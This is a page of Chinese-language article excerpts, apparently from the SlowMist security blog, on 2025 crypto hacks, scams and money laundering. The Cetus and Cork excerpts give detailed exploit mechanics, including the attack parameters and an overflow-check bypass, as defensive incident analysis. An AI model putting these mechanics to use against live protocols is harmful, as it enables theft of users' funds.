65.94%。注:本报告数据基于事件发生时的代币价格,由于币价波动、部分未公开事件以及普通用户的损失未纳入统计等因素,实际损失应高于统计结果。(https://hacked.slowmist.io/)1. 从生态维度看Ethereum 依然是攻击重灾区,相关损失约 3,859 万美元。其次是 Solana,损失约 580 万美元,再者为 BSC,损失约 549 万美元。2. 从项目类型看DeFi 是最常受到攻击的类型。2025 年上半年 DeFi 类型安全事件共 92 件,占事件总数(121 起)的 76.03%,损失高达 4.7 亿美元,对比 2024 年上半年(共 158 件,损失约 6.59 亿美元),损失同比下降 28.67%。其次是交易所平台相关事件共 11 起,但损失金额却高达 18.83 亿美元,其中以 Bybit 被攻击最为严重,单起事件造成约 14.6 亿美元损失。3. 从损失规模看上半年有 2 起事件损失超过 1 亿美元,前十大攻击事件共计损失 20.18 亿美元。4. 从攻击原因看账号被黑导致的安全事件最多,达 42 件。其次为合约漏洞导致的安全事件,达 35 件。欺诈手法除了直接攻击项目或协议,围绕普通用户的“骗术”也在快速进化。此节选取 2025 年上半年值得重点关注的几种典型或新型的欺诈手法。1. 利用 EIP-7702 钓鱼此类钓鱼攻击利用了 EIP-7702 带来的委托机制变更 —— 用户的 EOA 地址可以被授权给某个合约,使其具备这个合约的特性...

416天前慢雾科技慢雾科技
慢雾出品 | 2025 年上半年区块链安全与反洗钱报告

超 550 亿 USDT 流转背后的汇旺支付(HuionePay) 链上数据分析

来源:慢雾科技原文链接:https://mp.weixin.qq.com/s/JTLDQlZq-VR8H98fGW_pcg作者:Lisa编辑:Liz数据统计:慢雾 AML 团队随着全球打击网络诈骗、地下支付网络和非法跨境洗钱活动的力度持续加大,名为汇旺支付(HuionePay) 的平台引起了监管的高度关注。该平台涉嫌被用于诈骗资金的接收、转移及出金,尤其是在 TRON 链上通过 USDT 频繁进行链上操作。为进一步揭示其链上行为特征,慢雾(SlowMist) 基于链上反洗钱与追踪工具 MistTrack 与链上公开数据构建了 Dune 数据统计面板,并在此基础上开展了对汇旺支付(HuionePay) 在 TRON 链上 USDT 存取行为的深入分析。注:本文数据时间范围为 2024 年 1 月 1 日至 2025 年 6 月 23 日,数据源自慢雾(SlowMist) 制作的数据统计面板:https://dune.com/misttrack/huionepay-data。链上资金流动汇旺支付(HuionePay) 总存取金额(Sum) 提现总额:57,246,854,379 USDT存款总额:54,475,887,524 USDT存取金额均超过 500 亿 USDT,显示出汇旺支付(HuionePay) 在过去一年半内持续存在大量资金流入与流出,且提现金额始终高于存款金额,两者差值达 27.71 亿 USDT,有较明显的“资金净流出”特征。每周资金动向(Value Statis)图表数据显示,汇旺支付(HuionePay) 平台上的资金流动持续活跃,并在以下三个时间节点出现峰值:2024 年 7 月 8 日:首次出现明显高峰,充值与提现均突破 10 亿 USDT。2025 年 3 月与 5 月:两次提现金额接近或超过 11 亿 USDT。存款 / 提现交易笔数(Tx Count)数据显示,提现交易笔数自 2024 年 2 月起呈阶梯式上升,在 2025 年 5 月 12 日达到峰值,单日接近 15 万笔,呈现出“高频提款”特征。相较之下,存款交易数量虽整体增长,但波动较小,存款笔数也稳步增长至每日近 14 万笔,整体用户活跃度并未明显下降。此外,2025 年 3 月与 5 月的提现金额高峰伴随着交易笔数的同步上涨,两个高峰几乎重合。用户行为存取用户数(Users)自 2024 年初以来,汇旺支付(HuionePay) 在 TRON 链上的活跃存款地址数量从不足 3 万增长至超过 8 万,呈现出稳定增长趋势。需要说明的是,图表数据按地址去重统计,即存款地址大致可视为用户数量,而提现地址则可能为用户自定义的接收地址,无法等同实际用户。存款地址数量的持续增长表明平台仍在不断吸引新用户,不过增长速度呈缓和态势。活跃地址提现地址 Top 3我们使用链上反洗钱与追踪工具 MistTrack 进行分析,汇旺支付(HuionePay) 平台的提现行为呈现出一定程度的“资金集中”特征。其中,排名前三的提现地址如下:地址 1 — TWS84SZ2GE2EgyZDCrfVuEJXpoXYuBxteS — 8.16 亿 USDT地址 2 — T9yFi9yxwBUjMbHwBFKDdwFdBwvzUAqBfR — 5.8 亿 USDT地址 3 — TTSSC4TEYtQMAMURND6i1FPYaaBJMGY4ed — 5.12 亿 USDT上述地址的最早交易均可以追溯至 2023 年,长期...

423天前慢雾科技慢雾科技
超 550 亿 USDT 流转背后的汇旺支付(HuionePay) 链上数据分析

近 1 亿美元被销毁:伊朗交易所 Nobitex 被盗事件梳理

作者:Lisa & 23pds编辑:Sherry背景2025 年 6 月 18 日,链上侦探 ZachXBT 披露,伊朗最大的加密交易平台 Nobitex 疑似遭遇黑客攻击,涉及多条公链的大额资产异常转移。(https://t.me/investigations)慢雾(SlowMist) 进一步确认,事件中受影响资产涵盖 TRON、EVM 及 BTC 网络,初步估算损失约为 8,170 万美元。(https://x.com/slowmist_team/status/1935246606095593578)Nobitex 也发布公告确认,部分基础设施和热钱包确实遭遇未授权访问,但强调用户资金安全无虞。(https://x.com/nobitexmarket/status/1935244739575480472)值得注意的是,攻击者不仅转移了资金,还主动将大量资产转入特制销毁地址,被“烧毁”的资产价值近 1 亿美元。(https://x.com/GonjeshkeDarand/status/1935412212320891089)时间线梳理6 月 18 日ZachXBT 披露伊朗加密交易所 Nobitex 疑似遭遇黑客攻击,在 TRON 链上发生大量可疑出金交易。慢雾(SlowMist) 进一步确认攻击涉及多条链,初步估算损失约为 8,170 万美元。Nobitex 表示,技术团队检测到部分基础设施与热钱包遭到非法访问,已立即切断外部接口并启动调查。绝大多数资产存储在冷钱包中未受影响,此次入侵仅限于其用于日常流动性的部分热钱包。黑客组织 Predatory Sparrow (Gonjeshke Darande) 宣称对此次攻击负责,并宣告将在 24 小时内公布 Nobitex 源代码和内部数据。(https://x.com/GonjeshkeDarand/status/1935231018937536681)6 月 19 日Nobitex 发布第四号声明,表示平台已彻底封锁服务器外部访问路径,热钱包转账系“安全团队为保障资金所做的主动迁移”。同时,官方确认被盗资产被转移到一些由任意字符组成的非标准地址的钱包中,这些钱包被用来销毁用户资产,总计约 1 亿美元。黑客组织 Predatory Sparrow (Gonjeshke Darande) 宣称已烧毁价值约 9,000 万美元的加密资产,并称其为“制裁规避工具”。黑客组织 Predatory Sparrow (Gonjeshke Darande) 公开 Nobitex 源代码。(https://x.com/GonjeshkeDarand/status/1935593397156270534)源码信息根据攻击者放出来的源码信息,得到文件夹信息如下:具体来说,涉及下列内容:Nobitex 的核心系统主要采用 Python 编写,并使用 K8s 进行部署与管理。结合已知信息,我们猜测攻击者可能是突破了运维边界,从而进入内网,此处暂不展开分析。MistTrack 分析攻击者使用了多个看似合法、实则不可控的“销毁地址”接收资产,这些地址多数符合链上地址格式校验规则,能够成功接收资产,但一旦资金转入,即等于永久销毁,同时,这些地址还带有情绪性、挑衅性词汇,具有攻击意味。攻击者使用的部分“销毁地址”如下:TKFuckiRGCTerroristsNoBiTEXy2r7mNX0xffFFfFFffFFffFfFffFFfFfFfFFFFfFfFFFFDead1FuckiRGCTerroristsNoBiTEX...

428天前慢雾科技Nobitex慢雾科技
近 1 亿美元被销毁:伊朗交易所 Nobitex 被盗事件梳理

Web3 安全入门避坑指南|硬件钱包的常见陷阱

作者:Liz编辑:Sherry背景在上一期 Web3 安全入门避坑指南中,我们聊到了剪贴板安全。近期,一位受害者联系到慢雾安全团队,称其在抖音购买到被篡改的冷钱包,导致约 5,000 万元的加密资产被盗。本期我们聚焦一个大家普遍信赖,但使用中却存在诸多误区的工具 —— 硬件钱包。(https://x.com/SlowMist_Team/status/1933799086106538101)硬件钱包因私钥离线存储,一直被视为保护加密资产的可靠工具。然而,随着加密资产价值不断攀升,针对硬件钱包的攻击手段也不断升级:从假冒硬件钱包、伪固件更新 / 验证、钓鱼网站,到精心设计的社会工程陷阱,许多用户在不经意间落入陷阱,最终资产被洗劫一空。看似安全的设备,实则暗藏后门;看似官方的邮件,实则来自攻击者之手。本文将围绕硬件钱包的购买、使用和存放三大环节,梳理常见风险,结合真实案例解析典型骗局,并给出实用防护建议,帮助用户有效保护加密资产安全。购买环节的风险购买方面主要有两类骗局:假钱包:设备外观正常,实则固件已被篡改,一旦使用,私钥可能悄无声息地泄露;真钱包 + 恶意引导:攻击者利用用户缺乏安全知识,通过非官方渠道出售“已被初始化”的设备,或者诱导用户下载伪造的配套应用,再通过钓鱼或社工手段完成收割。我们来看一个典型案例:某用户从电商平台购买了一款硬件钱包,打开包装后发现说明书居然长得像刮刮卡。攻击者通过提前激活设备、获取助记词后,再将硬件钱包重新封装,并配上伪造说明书,通过非官方渠道出售。一旦用户按照说明扫码激活并将资产转入钱包地址,资金便立即被转走,落入假钱包标准盗币流程。这类骗局针对首次接触硬件钱包的用户。由于缺乏相关背景知识,用户并未意识到“出厂预设助记词”本身就是严重的安全异常。(https://www.reddit.com/r/ledgerwallet/comments/w0jrcg/is_this_a_legit_productbought_from_amazon_came/)除了这类“激活 + 重封装”的套路,还有一种更隐蔽、更高阶的攻击方式:固件层面的篡改。设备内的固件,在外观完全正常的情况下被植入后门。对用户而言,这类攻击几乎无法察觉,毕竟固件校验、拆机验证成本不低,也并非是每个人都具备的技能。一旦用户将资产存入此类设备,隐藏的后门便悄然触发:攻击者可远程提取私钥、签署交易,将资产转移至自己的地址。整个过程悄无声息,等用户察觉时,往往为时已晚。(https://x.com/kaspersky/status/1658087396481613824)因此,用户务必通过品牌官网或官方授权渠道购买硬件钱包,避免因贪图便利或便宜而选择非正规平台。尤其是二手设备或来路不明的新品,可能早已被篡改、初始化。使用过程中的攻击点签名授权中的钓鱼陷阱硬件钱包虽然能隔离私钥,却无法杜绝“盲签”带来的钓鱼攻击。所谓盲签,就像在一张空白支票上签字 —— 用户在未明确知晓交易内容的情况下,便对一串难以辨认的签名请求或哈希数据进行了确认。这意味着,哪怕是在硬件钱包的保护下,用户仍可能在毫无察觉的情况下,授权了一笔向陌生地址的转账,或执行了带有恶意逻辑的智能合约。盲签攻击常通过伪装巧妙的钓鱼页面诱导用户签名,过去几年中,黑客通过这类方式盗走了大量用户资产。随着 DeFi、NFT 等智能合约场景不断扩展,签名操作愈发复杂。应对之道,是选择支持“所见即所签”的硬件钱包,确保每笔交易信息都能在设备屏幕上清晰显示并逐项确认。(https://www.ledger.com/zh-ha...

431天前慢雾科技慢雾科技
Web3 安全入门避坑指南|硬件钱包的常见陷阱

每月动态 | Web3 安全事件总损失约 2.66 亿美元

概览2025 年 5 月,Web3 安全事件总损失约 2.66 亿美元。其中,据慢雾区块链被黑档案库(https://hacked.slowmist.io) 统计,共发生 15 起被黑事件,导致损失约 2.57 亿美元,有 1.62 亿美元得到冻结或返还,事件原因涉及合约漏洞、预言机攻击和账号被黑等。此外,据 Web3 反诈骗平台 Scam Sniffer 统计,本月有 7,164 名钓鱼事件受害者,损失规模达 963 万美元。(https://dune.com/scam-sniffer/may-2025-scam-sniffer-scam-report)安全大事件Cetus Protocol2025 年 5 月 22 日,SUI 生态上的流动性提供商 Cetus Protocol 遭攻击,流动性池深度大幅下降,Cetus 上多个代币交易对出现下跌,损失约 2.3 亿美元。 事件发生后,慢雾安全团队第一时间介入分析发现,此次事件的核心是攻击者通过精心构造参数,使溢出发生但又能绕过检测,最终用极小的 Token 金额即可换取巨额流动性资产,详细分析见慢雾:Cetus 被盗 2.3 亿美金事件分析。(攻击时序图)幸运的是,据 Cetus 称,在 SUI 基金会及其他生态系统成员合作下,目前已成功冻结了在 SUI 上的 1.62 亿美元的被盗资金。(https://x.com/CetusProtocol/status/1925567348586815622)Cork Protocol2025 年 5 月 28 日,慢雾(SlowMist) 监测到与 Cork Protocol 相关的潜在可疑活动。据慢雾安全团队分析,此次攻击的根本原因在于一方面 Cork 允许用户通过 CorkConfig 合约创建以任意资产作为赎回资产(RA),使得攻击者可以将 DS 作为 RA 使用。另一方面任意用户都可以无需授权的调用 CorkHook 合约的 beforeSwap 函数,并允许用户传入自定的 hook 数据进行 CorkCall 操作,使得攻击者可以操控,将合法市场中的 DS 存入另一个市场中作为 RA 使用,并获得对应的 DS 和 CT 代币。(https://x.com/SlowMist_Team/status/1927705256915333359)据链上反洗钱与追踪工具 MistTrack 分析,攻击者地址 0xea6f30e360192bae715599e15e2f765b49e4da98 获利 3,761.878 wstETH,价值超 1,200 万美元。截至目前,共有 4,530.5955 ETH 停留在攻击者地址上,我们将持续对资金进行监控。BitoPro据链上侦探 ZachXBT 披露,台湾加密货币交易所 BitoPro 疑似在 2025 年 5 月 8 日遭遇攻击,损失金额约为 1,150 万美元。BitoPro 在 Tron、Ethereum、Solana、Polygon 等多个链上的热钱包出现异常资金外流,被盗资产通过去中心化交易所被迅速抛售。随后,这些资金被转入 Tornado Cash,或通过 Thorchain 跨链转至比特币网络,并进一步存入 Wasabi 钱包进行洗钱。(https://x.com/zachxbt/status/1929417001296146868)Demex2025 年 5 月 16 日,Demex 的借贷市场 Nitron 遭攻击,损失约 95 万美元。据 Demex 发布的事故分析报告...

444天前慢雾科技慢雾科技
每月动态 | Web3 安全事件总损失约 2.66 亿美元

被黑分析|Cork Protocol 遭攻击,损失超千万美元

作者:Kong & Lisa编辑:Liz 背景5 月 28 日,慢雾(SlowMist) 检测到与 Cork Protocol 相关的潜在可疑活动并发布安全提醒,建议用户提高警惕,注意账户与资金安全。(https://x.com/SlowMist_Team/status/1927705256915333359)不久后,Cork Protocol 发布公告表示:“今日 UTC 时间 11:23,wstETH:weETH 市场发生安全事件。为防止风险扩大,Cork 已暂停所有其他市场交易,目前暂无其他市场受影响。团队正在积极调查事件原因,并将持续更新相关进展。” (https://x.com/Corkprotocol/status/1927808041984086083)事件发生后,慢雾安全团队第一时间介入分析,以下是对攻击手法及资金转移路径的详细解析。前置知识Cork Protocol 是一个旨在为 DeFi 生态提供类似传统金融中信用违约掉期(CDS) 功能的工具 —— Depeg 掉期,专门用于对冲稳定币、流动性质押代币、RWA 等挂钩资产的脱锚风险。其核心机制围绕稳定币和流动性质押代币的脱锚风险展开,允许用户通过交易风险衍生品,将稳定币或 LST/LRT 的价格波动风险转移给市场参与者,从而降低风险并提升资本效率,关键概念如下:RA(Redemption Asset | 赎回资产):Cork 市场中用于赎回或结算脱锚事件的基准资产(例如 ETH::stETH 市场中的 ETH)。PA(Pegged Asset | 挂钩资产):存在脱锚风险的资产,目标是与 RA 保持价格挂钩,但可能因市场波动、协议风险等因素偏离锚定汇率(例如 ETH::stETH 市场中的 stETH)。DS(Depeg Swap | 脱锚掉期):Cork 协议发行的核心衍生工具,用于对冲脱锚风险,本质类似传统金融中的信用违约掉期(CDS),用户可以购买此类代币来规避脱锚风险。CT(Cover Token | 覆盖代币):与 DS 配对的衍生工具,用于承担脱锚风险并赚取收益,类似 CDS 中的卖方角色,如果发生脱锚,持有者将承担损失。Exchange Rate:衡量 PA 与 RA 之间价值关系的核心参数,直接影响脱锚事件的判定和衍生品交易的结算逻辑。目前,Cork 协议允许用户使用自定义 Exchange Rate Provider 创建市场。Cork Vault:自动化管理跨期限的流动性,提升资本效率。Peg Stability Module (PSM):负责铸造/销毁 DS 和 CT,设定市场期限,并通过 AMM 动态调整价格。其允许用户做以下兑换PA + DS = RACT + DS = RA根本原因此次攻击的根本原因在于一方面 Cork 允许用户通过 CorkConfig 合约创建以任意资产作为赎回资产(RA),使得攻击者可以将 DS 作为 RA 使用。另一方面任意用户都可以无需授权的调用 CorkHook 合约的 beforeSwap 函数,并允许用户传入自定的 hook 数据进行 CorkCall 操作,使得攻击者可以操控,将合法市场中的 DS 存入另一个市场中作为 RA 使用,并获得对应的 DS 和 CT 代币。攻击分析攻击者首先在合法市场上用 wstETH 购买了 weETH8CT-2 代币,以便最后可...

446天前慢雾科技慢雾科技
被黑分析|Cork Protocol 遭攻击,损失超千万美元

慢雾:Cetus 被盗 2.3 亿美金事件分析

来源:慢雾科技原文链接:https://mp.weixin.qq.com/s/w4xkia029ZMKNjrXnT506g5 月 22 日,据社区消息,SUI 生态上的流动性提供商 Cetus 疑似遭攻击,流动性池深度大幅下降,Cetus 上多个代币交易对出现下跌,预计损失金额超过 2.3 亿美元。随后,Cetus 发布公告称:“我们协议中检测到了一起事件,安全起见,智能合约已暂时暂停。目前,团队正在对该事件展开调查。我们很快会发布进一步的调查声明。” 事件发生后,慢雾安全团队第一时间介入分析,并发布安全提醒。以下是对攻击手法及资金转移情况的详细解析。(https://x.com/CetusProtocol/status/1925515662346404024)相关信息其中一笔攻击交易:https://suiscan.xyz/mainnet/tx/DVMG3B2kocLEnVMDuQzTYRgjwuuFSfciawPvXXheB3x攻击者地址:0xe28b50cef1d633ea43d3296a3f6b67ff0312a5f1a99f0af753c85b8b5de8ff06被攻击的池子地址:0x871d8a227114f375170f149f7e9d45be822dd003eba225e83c05ac80828596bc涉及代币:haSUI / SUI攻击分析 此次事件的核心是攻击者通过精心构造参数,使溢出发生但又能绕过检测,最终用极小的 Token 金额即可换取巨额流动性资产,以下为具体步骤解析:(攻击时序图)1. 攻击者首先通过闪电贷借出了 10,024,321.28 个 haSUI,导致池子价格从 18,956,530,795,606,879,104 暴跌至 18,425,720,184762886,价格下跌幅度达到 99.90%。2. 攻击者精心选择了一个极窄的价格区间开立流动性头寸:Tick 下限:300000(价格:60,257,519,765,924,248,467,716,150)Tick 上限:300200 (价格:60,863,087,478,126,617,965,993,239)价格区间宽度:仅 1.00496621%3. 接着就是此次攻击的核心,攻击者声明要添加 10,365,647,984,364,446,732,462,244,378,333,008 单位的巨大流动性,但由于存在漏洞,系统只收取了 1 个代币 A。我们来分析一下攻击者为什么能够用 1 个 Token 兑换出巨额流动性。其核心原因在于 get_delta_a 函数中的 checked_shlw 存在溢出检测绕过漏洞。攻击者正是利用了这一点,使得系统在计算实际需要添加多少 haSUI 时出现了严重偏差。由于溢出未被检测,系统误判了所需 haSUI 的数量,导致攻击者仅需极少的 Token,就能兑换出大量的流动性资产,从而实现了攻击。当系统计算添加如此巨大流动性需要多少 haSUI 时:public fun get_delta_a(    sqrt_price_0: u128,    sqrt_price_1: u128,&nbsp...

453天前慢雾科技慢雾科技
慢雾:Cetus 被盗 2.3 亿美金事件分析

黑暗森林里的“客服”:社工骗局盯上 Coinbase 用户

作者:Liz & Lisa编辑:Sherry背景在加密资产领域,社会工程攻击正成为用户资金安全的重大威胁。自 2025 年以来,大量针对 Coinbase 用户的社交工程诈骗事件不断浮出水面,引发了社区的广泛关注。从社区的讨论不难看出,此类事件并非孤立个案,而是一种具有持续性和组织化特征的骗局类型。5 月 15 日,Coinbase 发布公告,证实了此前关于 Coinbase 里有“内鬼”的种种猜测。据悉,美国司法部(DOJ) 已启动针对该起数据泄露事件的调查。本文将通过整理多位安全研究者和受害者提供的信息,披露诈骗者的主要作案手法,并从平台和用户两个视角出发,探讨如何有效应对此类骗局。(https://x.com/coinbase/status/1922967576209998133)历史分析“仅过去一周,又有超 4,500 万美元因社会工程诈骗从 Coinbase 用户处盗走”,链上侦探 Zach 在 5 月 7 日的 Telegram 更新中这样写道。过去一年中,Zach 多次在其 Telegram 频道和 X 平台上披露 Coinbase 用户被盗事件,个别受害者的损失高达上千万美元。Zach 在 2025 年 2 月曾发布详细调查称,仅 2024 年 12 月至 2025 年 1 月间,因类似骗局被盗的资金总额已超 6,500 万美元,并揭示 Coinbase 正面临一场严重的“社工诈骗”危机,这类攻击正以年均 3 亿美元的规模持续侵害用户资产安全。他还指出:主导这类诈骗的团伙主要分为两类:一类是来自 Com 圈的低级攻击者(skids),另一类则是位于印度的网络犯罪组织;诈骗团伙的攻击目标以美国用户为主,作案手法标准化、话术流程成熟;实际损失金额可能远高于链上可见统计,因未包含无法获取的 Coinbase 客服工单和警方报案记录等未公开信息。(https://x.com/zachxbt/status/1886411891213230114)骗局手法在此次事件中,Coinbase 的技术系统并未被攻破,诈骗者是利用了内部员工的权限,获取了部分用户的敏感信息。这些信息包括:姓名、地址、联系方式、账户数据、身份证照片等。诈骗者最终目的是利用社会工程手段引导用户转账。(https://www.coinbase.com/blog/protecting-our-customers-standing-up-to-extortionists)这一类型的攻击方式,改变了传统“撒网式”的钓鱼手段,而是转向“精准打击”,堪称“量身定制”的社工诈骗。典型作案路径如下:1. 以“官方客服”身份联系用户诈骗者使用伪造电话系统(PBX) 冒充 Coinbase 客服,打电话给用户称其“账户遭遇非法登录”,或“检测到提现异常”,营造紧急氛围。他们随后会发送仿真的钓鱼邮件或短信,其中包含虚假的工单编号或“恢复流程”链接,并引导用户操作。这些链接可能指向克隆的 Coinbase 界面,甚至能发送看似来自官方域名的邮件,部分邮件利用了重定向技术绕过安全防护。2. 引导用户下载 Coinbase Wallet诈骗者会以“保护资产”为由,引导用户转移资金至“安全钱包”,还会协助用户安装 Coinbase Wallet,并指引其将原本托管在 Coinbase 上的资产,转入一个新创建的钱包。3. 诱导用户使用诈骗者提供的助记词与传统“骗取助记词”不同,诈骗者直接提供一组他们自己生成的助记词,诱导用户将其用作“官方新钱包”。4. 诈骗者进行资金盗取受害者在紧张、...

457天前慢雾科技慢雾科技
黑暗森林里的“客服”:社工骗局盯上 Coinbase 用户

黑吃黑:全球头号勒索团伙 LockBit 被黑事件分析

前情回顾:LockBit 是谁?LockBit 是一个活跃的勒索软件即服务(RaaS,Ransomware-as-a-Service) 组织,最早出现在 2019 年 9 月,由于最初版本在加密文件时会添加“.abcd”后缀,它曾被称为“ABCD 勒索软件”。该团伙以其技术成熟、高度自动化、勒索效率高而著称,在全球范围内发起了大量针对企业、政府、教育和医疗机构的攻击,已被多个国家安全机构列为高级持续性威胁(APT) 组织。我们曾在去年披露过这个组织。LockBit 的技术持续迭代,发展出多个版本:LockBit 1.0 (2019):以“.abcd”加密后缀为特征,支持 Windows 平台,使用 RSA + AES 算法加密,执行速度快;LockBit 2.0 (2021):引入自动化传播能力,提高勒索效率;LockBit 3.0 / LockBit Black (2022):模块化设计,具备强抗分析能力,还首次推出了漏洞赏金计划,向外部安全研究者悬赏测试勒索软件;LockBit Green(传闻中的 2023 版本):疑似整合了已解散的 Conti 勒索团伙部分代码。作为 RaaS 模式的典型代表,LockBit 通过核心开发者提供勒索软件工具包,吸引“加盟者(Affiliates)” 负责具体攻击、渗透与部署,并通过赎金分成来激励合作,一般攻击者可获分成 70%。此外,其“双重勒索”策略也极具压迫性:一方面加密文件,另一方面窃取数据并威胁公开,一旦受害者拒绝支付赎金,数据将会被挂在其专属泄露站点上。技术层面上,LockBit 支持 Windows 和 Linux 系统,使用多线程加密技术与 AES-NI 指令集实现高性能加密,具备内网横向移动能力(如使用 PSExec、RDP 爆破等),加密前还会主动关闭数据库、删除备份等关键服务。LockBit 的攻击通常高度系统化,具备典型的 APT 特征。整个攻击链条大致如下:初始访问(钓鱼邮件、漏洞利用、RDP 弱口令)横向移动(Mimikatz、Cobalt Strike 等)权限提升数据窃取文件加密弹出勒索信息公布信息至泄露站点(若未付款)LockBit 活跃期间曾掀起多起轰动事件:2022 年攻击意大利税务局,影响数百万纳税人数据;曾声称入侵加拿大 SickKids 医院,后道歉并提供解密器;多起制造商(如防务、医疗设备企业)遭 LockBit 加密;2022 年第二季度,占全球勒索攻击的 40% 以上;累计影响超过 1000 家企业,远超 Conti、REvil 等老牌团伙;勒索成功率极高,2022 年其提出的 1 亿美元赎金中有超过一半成功拿到。不过,即便强如 LockBit,也并非无懈可击。2024 年 2 月 19 日,LockBit 网站在英国国家犯罪局、美国联邦调查局、欧洲刑警组织和国际警察机构联盟的联合执法行动中被查封,多名 LockBit 成员被逮捕或通缉,但核心开发团队仍未被完全瓦解,部分样本仍在暗网上流传,被分支团体继续使用。突发事件:LockBit 站点被黑今日,慢雾(SlowMist) 收到情报:LockBit 的 onion 站点被黑,攻击者不仅接管了其控制面板,还放出了一份包含数据库的打包文件,此举导致 LockBit 的数据库被泄露,包括比特币地址、私钥、聊天记录以及其关联公司等敏感信息。更具戏剧性的是,黑客在被篡改的站点上留下了意味深长的一句话:“不要犯罪,犯罪是不好的,来自布拉格。”不久后,相关数据被上传至 GitHub 等平台,并迅速扩散。LockBit 官...

463天前慢雾科技慢雾科技
黑吃黑:全球头号勒索团伙 LockBit 被黑事件分析

慢雾:《Solana 智能合约安全最佳实践》全面更新

来源:慢雾科技原文链接:https://mp.weixin.qq.com/s/hIaAzTRMlsKshdPaByYhrw区块链技术的发展日新月异,智能合约作为去中心化应用的核心组成部分,其安全性依然是各大公链生态发展的基石。Solana 作为近年来脱颖而出的高性能公链,其快速的交易处理能力与创新的技术架构为生态带来了巨大潜力,但也伴随着一系列新的安全挑战,尤其是在账户管理、合约执行和状态更新等方面,给恶意攻击者带来了更多的攻击点。自 2021 年《Solana 智能合约安全最佳实践》发布以来,获得了社区的积极反馈。许多开发者、安全研究员对该手册表示认可和推荐:随着 Solana 生态的不断发展与新型漏洞的出现,我们对原有的实践进行了更新和补充,旨在为开发者提供更为全面的安全防护指引。更新要点概览此次更新的《Solana 智能合约安全最佳实践》基于慢雾(SlowMist) 最新的审计经验,详细总结了 Solana 智能合约中常见的安全问题和解决方案,涵盖了漏洞描述、利用场景、修复建议等多个维度,旨在为开发者提供一站式的安全参考与操作指南。以下为《Solana 智能合约安全最佳实践》最新版的目录:Solana 智能合约常见问题数值溢出算术精度误差未对返回错误进行处理缺少对初始化函数的权限控制Account Owner 未检查PDA 账户检查未对账户是否签名进行校验缺少对 system account 的检查缺少对 lamports 的检查Pyth 预言机检查及时状态重置利用 Anchor 框架的攻击签名者授权账户数据匹配所有者检查类型伪装 cosplay初始化检查任意 CPI重复的可变账户碰撞种子规范化PDA 共享关闭账户Sysvar 地址检查账户重新加载案例分析Sysvar 系统账号未检查漏洞示例防御代码使用 PDA 账户但是未对调用执行者账户与收益者账户进行检查漏洞示例防御代码该手册将持续更新,欢迎开发者、审计人员与安全专家前往 GitHub 查阅 (https://github.com/slowmist/solana-smart-contract-security-best-practices),共同提升 Solana 生态的安全性。安全贯穿始终根据慢雾(SlowMist) 区块链被黑事件档案库 (hacked.slowmist.io) 的统计,截至目前,全球范围内发生了 1,875 起区块链安全事件,导致损失总额超过 358 亿美元,其中有 305 起事件与智能合约漏洞直接相关。如果合约上线前缺乏系统化的安全检查,极有可能暴露于高风险中。慢雾(SlowMist) 多年的审计经验表明,智能合约的安全保障不应仅依赖一次性审计或漏洞修复,更应建立在持续审计和动态防护的体系上。因为随着时间的推移,安全环境可能会发生变化,新的漏洞与攻击方式也会不断出现。因此,保障智能合约安全需要从以下几个方面着手:安全预算的合理投入:在项目生命周期中确保安全预算的持续投入;持续审计与检测:定期进行智能合约的安全审计与漏洞修复;高层管理责任制:将安全责任落实到项目高层,确保审计工作得到足够重视与支持。结语慢雾安全团队在智能合约安全审计领域里深耕多年,已全面支持 Solana 生态的智能合约安全审计服务,涵盖 Solana 上多个核心项目,如 Particle Network、UniPassID、Crema Finance、Solyard.Finance、Larix 等。此外,慢雾(SlowMist) 自研的安全系统 Badwhale 也已支持 Solana 生态中的假...

466天前慢雾科技慢雾科技
慢雾:《Solana 智能合约安全最佳实践》全面更新